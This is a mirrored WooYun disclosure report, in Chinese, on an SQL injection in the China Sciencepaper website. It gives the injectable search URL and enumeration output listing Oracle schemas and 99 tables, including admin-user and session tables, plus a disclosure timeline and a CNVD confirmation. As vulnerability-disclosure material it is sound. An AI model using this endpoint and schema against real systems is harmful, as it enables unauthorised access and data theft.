乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-30: 细节已通知厂商并且等待厂商处理中 2015-02-04: 厂商已经确认,细节仅向厂商公开 2015-02-14: 细节向核心白帽子及相关领域专家公开 2015-02-24: 细节向普通白帽子公开 2015-03-06: 细节向实习白帽子公开 2015-03-16: 细节向公众公开
中国科技论文存在SQL注入
http://highlights.paper.edu.cn/search_section.php?year=2013&qi=6
available databases [24]:[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] HR[*] IX[*] MDSYS[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PAPER[*] PAPER_EN[*] PAPERDOCTORONLINE[*] PAPERONLINE[*] PM[*] SCOTT[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
Database: PAPERDOCTORONLINE[99 tables]+-----------------------------+| WORK || AAA || AAAA || AAAAA || ACTIVE_USER || ADMIN_USER || ADVERTISE || AGREE_AGAINST || APPSTAR_LIST || ARTICLE_TITLE || ASK || ATTACHMENTS || BLACK_LIST || BOOKING_JOURNAL || BOOKING_JOURNALPAPER || BOOKING_JOURNALTEMP || COMMEND_ATTACHMENTS || COMMEND_PAPER || COMMEND_PAPER_TMP || COMMEND_USER || COMMENT_TABLE || COMMENT_TABLE_TMP || DOCTOR_FIELD_BELONG || DOCTOR_FIELD_BELONG_NEW || DOCTOR_PAPER_TABLE || DOCTOR_PAPER_TMP || DOWNLOAD_LOG || DOWNLOAD_LOG_20071217 || FEATURE_FIELD_BELONG_NEW || FEATURE_PAPER_TABLE || FEATURE_PAPER_TMP || FIELD_BELONG || FIELD_BELONG_EN || FILED_BELONG_TEST || GRADE_PAPER || GROUP_MAIL || JINGPIN_COUNTER || JINGPIN_HOTPAPER || JINGPIN_LUNWEN || JINGPIN_LUNWEN_BAK_20110301 || JINGPIN_MAIL || JINGPIN_NOTICE || JINGPIN_PERSON || JINGPIN_SUBSCRIBE || JOURNAL || JOURNAL_FIELD_BELONG || JOURNAL_PAPER || JOURNAL_TEMP || KEEP_LIST || LOG || MAILBOX || PAPER_COMMEND || PAPER_DATE_ID || PAPER_SEARCH$_TEMP || PAPER_SEARCH_TRS$_TEMP || PRINTAPPLY || PROJECT || PROVINCE_CROP || QUEST_TEMP_EXPLAIN || REJECT_TABLE || RELEASE_PAPER || RIGHT_SYSACCESSMODULE || RIGHT_SYSCODING || RIGHT_SYSLOG || RIGHT_SYSSYSTEMMODULE || RIGHT_SYSSYSTEMMODULEACTION || RIGHT_SYSUSER || RIGHT_SYSUSERDEPT || RIGHT_SYSUSERDEPTMEMBER || RIGHT_SYSUSERROLE || RIGHT_SYSUSERROLEMEMBER || SCHOLAR_ATTACHMENTS || SCHOLAR_PAPER || SCHOOL_USERS || SELF_COMMEND_SCHOLAR || SELF_COMMEND_SCHOLARPAPER || SESSIONS || SURVEY_INFO || SURVEY_INFO_OLD || S_FIELD_BELONG || TABDFWZDATA || TABXKZDFORSCHO || TABYHXXNEW || TAB_ZXLWCOMMENT || TEST || TITLE || TITLE_DOCTOR || TITLE_JOURNAL || TITLE_SCHOLAR || TRS_SER || T_TEMP || T_TEMP1 || UNSETTLED_PAPER || USERNAME_TEMP || USER_INFO || VOTE_INFO || WEB_SITE_COUNTER || WORK_PAPER || WORK_TEMP |+-----------------------------+
修复你们专业未深入
危害等级:中
漏洞Rank:10
确认时间:2015-02-04 11:08
CNVD确认所述情况,转由CNCERT向教育部通报。
暂无